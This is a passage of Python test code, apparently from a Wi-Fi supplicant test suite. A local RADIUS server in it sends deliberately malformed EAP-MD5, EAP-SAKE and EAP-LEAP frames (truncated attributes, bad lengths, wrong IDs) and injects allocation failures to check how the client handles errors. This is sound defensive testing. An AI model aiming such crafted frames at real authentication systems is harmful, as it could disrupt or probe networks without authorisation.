EAP_ERP_TLV_DOMAIN_NAME = 4
EAP_ERP_TLV_CRYPTOSUITES = 5
EAP_ERP_TLV_AUTHORIZATION_INDICATION = 6
EAP_ERP_TLV_CALLED_STATION_ID = 128
EAP_ERP_TLV_CALLING_STATION_ID = 129
EAP_ERP_TLV_NAS_IDENTIFIER = 130
EAP_ERP_TLV_NAS_IP_ADDRESS = 131
EAP_ERP_TLV_NAS_IPV6_ADDRESS = 132
def run_pyrad_server(srv, t_stop, eap_handler):
srv.RunWithStop(t_stop, eap_handler)
def start_radius_server(eap_handler):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
eap = ""
for p in pkt[79]:
eap += p
eap_req = self.eap_handler(self.ctx, eap)
reply = self.CreateReplyPacket(pkt)
if eap_req:
while True:
if len(eap_req) > 253:
reply.AddAttribute("EAP-Message", eap_req[0:253])
eap_req = eap_req[253:]
else:
reply.AddAttribute("EAP-Message", eap_req)
break
else:
logger.info("No EAP request available")
reply.code = pyrad.packet.AccessChallenge
hmac_obj = hmac.new(reply.secret)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_stop, eap_handler):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_stop = t_stop
self.eap_handler = eap_handler
self.ctx = {}
while not t_stop.is_set():
for (fd, event) in self._poll.poll(200):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_stop = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_stop, eap_handler))
t.start()
return { 'srv': srv, 'stop': t_stop, 'thread': t }
def stop_radius_server(srv):
srv['stop'].set()
srv['thread'].join()
def start_ap(ifname):
params = hostapd.wpa2_eap_params(ssid="eap-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(ifname, params)
return hapd
def test_eap_proto(dev, apdev):
"""EAP protocol tests"""
check_eap_capa(dev[0], "MD5")
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 2")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 3")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 2, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('B'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('C'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('D'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('E'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request (same id)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'] - 1,
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('F'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 2, 4)
return None
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION A":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION B":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION C":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION D":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION E":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION F":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
EAP_SAKE_VERSION = 2
EAP_SAKE_SUBTYPE_CHALLENGE = 1
EAP_SAKE_SUBTYPE_CONFIRM = 2
EAP_SAKE_SUBTYPE_AUTH_REJECT = 3
EAP_SAKE_SUBTYPE_IDENTITY = 4
EAP_SAKE_AT_RAND_S = 1
EAP_SAKE_AT_RAND_P = 2
EAP_SAKE_AT_MIC_S = 3
EAP_SAKE_AT_MIC_P = 4
EAP_SAKE_AT_SERVERID = 5
EAP_SAKE_AT_PEERID = 6
EAP_SAKE_AT_SPI_S = 7
EAP_SAKE_AT_SPI_P = 8
EAP_SAKE_AT_ANY_ID_REQ = 9
EAP_SAKE_AT_PERM_ID_REQ = 10
EAP_SAKE_AT_ENCR_DATA = 128
EAP_SAKE_AT_IV = 129
EAP_SAKE_AT_PADDING = 130
EAP_SAKE_AT_NEXT_TMPID = 131
EAP_SAKE_AT_MSK_LIFE = 132
def test_eap_proto_sake(dev, apdev):
"""EAP-SAKE protocol tests"""
global eap_proto_sake_test_done
eap_proto_sake_test_done = False
def sake_challenge(ctx):
logger.info("Test: Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_SAKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype (different session id)")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 1, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with truncated attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute header")
payload = struct.pack("B", EAP_SAKE_AT_ANY_ID_REQ)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with AT_IV but not AT_ENCR_DATA")
payload = struct.pack("BB", EAP_SAKE_AT_IV, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with skippable and non-skippable unknown attribute")
payload = struct.pack("BBBB", 255, 2, 127, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_RAND_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_RAND_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MIC_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_MIC_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PERM_ID_REQ with invalid payload length")
payload = struct.pack("BBBBBBBBBBBBBB",
EAP_SAKE_AT_SPI_S, 2,
EAP_SAKE_AT_SPI_P, 2,
EAP_SAKE_AT_ENCR_DATA, 2,
EAP_SAKE_AT_NEXT_TMPID, 2,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0, 0,
EAP_SAKE_AT_PERM_ID_REQ, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PADDING")
payload = struct.pack("BBBBBB",
EAP_SAKE_AT_PADDING, 3, 0,
EAP_SAKE_AT_PADDING, 3, 1)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MSK_LIFE")
payload = struct.pack(">BBLBBH",
EAP_SAKE_AT_MSK_LIFE, 6, 0,
EAP_SAKE_AT_MSK_LIFE, 4, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with invalid attribute length")
payload = struct.pack("BB", EAP_SAKE_AT_ANY_ID_REQ, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, 123)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype with too short AT_RAND_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 2)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with too short AT_MIC_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Confirm subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with incorrect AT_MIC_S")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
global eap_proto_sake_test_done
if eap_proto_sake_test_done:
return sake_challenge(ctx)
logger.info("No more test responses available - test case completed")
eap_proto_sake_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
while not eap_proto_sake_test_done:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
finally:
stop_radius_server(srv)
def test_eap_proto_sake_errors(dev, apdev):
"""EAP-SAKE local error cases"""
check_eap_capa(dev[0], "SAKE")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_sake_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ ( 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_challenge" ),
( 1, "=eap_sake_process_challenge" ),
( 1, "eap_sake_compute_mic;eap_sake_process_challenge" ),
( 1, "eap_sake_build_msg;eap_sake_process_confirm" ),
( 2, "eap_sake_compute_mic;eap_sake_process_confirm" ),
( 1, "eap_sake_getKey" ),
( 1, "eap_sake_get_emsk" ),
( 1, "eap_sake_get_session_id" ) ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_sake_process_challenge"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_sake_errors2(dev, apdev):
"""EAP-SAKE protocol tests (2)"""
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_identity"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_leap(dev, apdev):
"""EAP-LEAP protocol tests"""
check_eap_capa(dev[0], "LEAP")
def leap_handler(ctx, req):
logger.info("leap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 2:
logger.info("Test: Unexpected version")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 0)
if ctx['num'] == 3:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 4:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 8)
if ctx['num'] == 5:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 6:
logger.info("Test: Missing payload in Response")
return struct.pack(">BBHB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 7:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 8:
logger.info("Test: Unexpected version in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 8)
if ctx['num'] == 9:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 10:
logger.info("Test: Invalid challenge length in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 11:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 12:
logger.info("Test: Truncated challenge in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 24)
if ctx['num'] == 13:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 14:
logger.info("Test: Invalid challange value in Response")
return struct.pack(">BBHBBBB6L", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
